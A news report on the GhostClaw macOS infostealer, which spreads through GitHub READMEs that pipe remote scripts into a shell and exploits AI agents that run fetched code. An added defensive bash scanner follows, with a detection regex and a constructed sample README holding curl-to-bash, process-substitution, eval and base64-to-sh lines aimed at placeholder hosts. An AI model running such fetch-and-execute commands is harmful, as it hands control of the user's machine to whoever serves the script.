
GhostClaw macOS Malware Spreads Through GitHub Repositories

AppleInsider

GhostClaw, a macOS infostealer discovered by Jamf researchers, is spreading through GitHub repositories by exploiting routine developer install habits. The malware campaign has shifted from npm packages to GitHub repositories and AI-assisted development environments, where it blends into expected behavior rather than exploiting software vulnerabilities.

Developers routinely pull code from GitHub, follow the README, and run the install commands it gives them. That habit is what GhostClaw exploits: it slips into established workflows rather than breaking them. The malware turns up in repositories posing as SDKs, trading tools, or developer utilities, and a repository sometimes stays benign long enough to build a history and credibility before a malicious install step is introduced.

GhostClaw needs no kernel exploit or obvious break-in. It operates within the permissions the user has already granted, and it uses legitimate system tools to check that the credentials it collects are valid. The install instructions often boil down to a command that downloads a remote script and pipes it straight into a shell, which hands the attacker control the moment the developer pastes it. AI-assisted workflows widen the exposure: agents that fetch and run external components automatically remove the point at which a person would have read the command before executing it.
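The fetch-and-execute install idiom described above is something a developer can check for before following a README. The shell script below is an added example, not code from the article, from Jamf, or from any GhostClaw sample. It goes a little beyond the single "download and run a script" case in the text by flagging several common variants (pipe to shell, process substitution, eval of fetched output, decode-and-pipe). The README it scans and the example.invalid URLs are constructed, and the pattern list is an assumption to be tuned locally.

```shell
#!/usr/bin/env bash
# Added example (not from the article, Jamf, or any GhostClaw sample):
# flag install instructions in README files that fetch remote code and
# execute it in one step, so a reviewer sees them before pasting anything.

# Extended-regex alternatives for common fetch-and-execute idioms.
# The list is an assumption to tune locally; it is a triage aid, not proof of malice.
REMOTE_EXEC_PATTERN='(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(bash|zsh|sh)'  # curl ... | bash
REMOTE_EXEC_PATTERN="$REMOTE_EXEC_PATTERN"'|(bash|zsh|sh)[[:space:]]+<\((curl|wget)'   # bash <(curl ...)
REMOTE_EXEC_PATTERN="$REMOTE_EXEC_PATTERN"'|eval[[:space:]]+["$(]*(curl|wget)'          # eval "$(curl ...)"
REMOTE_EXEC_PATTERN="$REMOTE_EXEC_PATTERN"'|base64[[:space:]]+(-d|-D|--decode)[^|]*[|][[:space:]]*(bash|zsh|sh)'  # decode | sh

# Print how many lines of the file in $1 match a fetch-and-execute idiom (0 if none).
count_remote_exec_lines() {
    local n
    n=$(grep -E -c -e "$REMOTE_EXEC_PATTERN" -- "$1" 2>/dev/null) || true
    printf '%s\n' "${n:-0}"
}

# Print each matching line as file:line:text for human review.
flag_remote_exec_lines() {
    grep -E -n -H -e "$REMOTE_EXEC_PATTERN" -- "$@" || true
}

# Write a constructed README (not a real repository) to the path in $1.
write_sample_readme() {
    cat >"$1" <<'EOF'
# cool-trading-sdk (constructed sample, not a real project)

## Install

Quick install (recommended):

    curl -fsSL https://example.invalid/install.sh | bash

Or, if you prefer process substitution:

    bash <(curl -s https://example.invalid/setup)

Offline bootstrap (the blob is a constructed placeholder):

    echo 'QkxPQg==' | base64 -d | sh

Then run `eval "$(curl -s https://example.invalid/env)"` to set up your shell.

Manual install:

    git clone https://example.invalid/cool-trading-sdk.git
    cd cool-trading-sdk && make install
EOF
}

# Demonstration: scan the constructed README and show what a reviewer would see.
demo_readme=$(mktemp)
write_sample_readme "$demo_readme"
echo "Flagged $(count_remote_exec_lines "$demo_readme") line(s) in the constructed README:"
flag_remote_exec_lines "$demo_readme"
rm -f "$demo_readme"
```

Point `flag_remote_exec_lines` at a repository's README.md (and any install.sh it ships) before following the instructions. A hit is a prompt to download the referenced script and read it, not a verdict; and a clean result is no guarantee, since a plain `make install` or a package postinstall hook can run arbitrary code just as well. The same check is worth applying to any instruction an AI coding agent is about to execute on your behalf, since that is exactly the step the article says such workflows hide.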